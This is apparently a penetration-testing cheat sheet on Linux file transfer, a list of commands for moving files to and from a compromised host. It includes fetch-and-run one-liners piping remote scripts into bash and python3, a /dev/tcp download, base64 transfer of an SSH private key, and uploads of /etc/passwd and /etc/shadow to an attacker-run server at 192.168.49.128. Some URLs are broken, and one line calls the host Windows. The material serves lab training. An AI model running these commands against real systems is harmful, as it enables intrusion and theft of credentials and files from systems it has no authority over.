Linux File Transfer

This sections contains different methods to transfer a file to or from a windows machine.

Transfer files to target machine

Base64 Encoding / Decoding

# Check File MD5 hash
md5sum id_rsa

# Encode SSH Key to Base64
cat id_rsa |base64 -w 0;echo

# We copy this content, paste it onto our Linux target machine, and use base64 with the option `-d' to decode it.

# Decode the File
echo -n 'LS0t---S0tLQo=' | base64 -d > id_rsa

# Confirm the MD5 Hashes Match
md5sum id_rsa

Web Downloads with Wget and cURL

# Download a File Using cURL
curl -o /tmp/LinEnum.sh /rebootuser/LinEnum/master/LinEnum.sh

# Download a File Using wget
wget <https://rebootuser/LinEnum/master/LinEnum.sh> -O /tmp/LinEnum.sh

Fileless Attacks Using Linux

# Fileless Download with cURL
curl https://URL/LinEnum.sh | bash

# Fileless Download with wget
wget -qO- https://URL/helloworld.py | python3

Download with Bash (/dev/tcp)

# Connect to the Target Webserver
exec 3<>/dev/tcp/10.10.10.32/80

# HTTP GET Request
echo -e "GET /LinEnum.sh HTTP/1.1\\n\\n">&3

# Print the Response
cat <&3

SSH Downloads

# Enabling the SSH Server
sudo systemctl enable ssh

# Starting the SSH Server
sudo systemctl start ssh

# Checking for SSH Listening Port
netstat -lnpt

# Downloading Files Using SCP
scp plaintext@192.168.49.128:/root/myroot.txt .

Get files from target host to our attack machine

Web Upload

# Install uploadserver
python3 -m pip install --user uploadserver

# Create a Self-Signed Certificate
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

# creating a new directory to host the file for our webserver.
mkdir https && cd https

# start web server
python3 -m uploadserver 443 --server-certificate /root/server.pem

# Upload Multiple Files - from target host
curl -X POST <https://192.168.49.128/upload> -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

Alternative Web Server Method

# Creating a Web Server with Python3
python3 -m http.server

# Creating a Web Server with Python2.7
python2.7 -m SimpleHTTPServer

# Creating a Web Server with PHP
php -S 0.0.0.0:8000

# Creating a Web Server with Ruby
ruby -run -ehttpd . -p8000

# Download the File from the Target Machine onto the Pwnbox
wget 192.168.49.128:8000/filetotransfer.txt

SCP Upload

# We may find some companies that allow the SSH protocol (TCP/22) for outbound connections, and if that's the case, we can use an SSH server with the scp utility to upload files. Let's attempt to upload a file using the SSH protocol.
# run the comand and enter user and pass
scp /etc/passwd user@192.168.49.128:/home/user/
PreviousWindows File TransferNextLinux Local Password Attacks

Last updated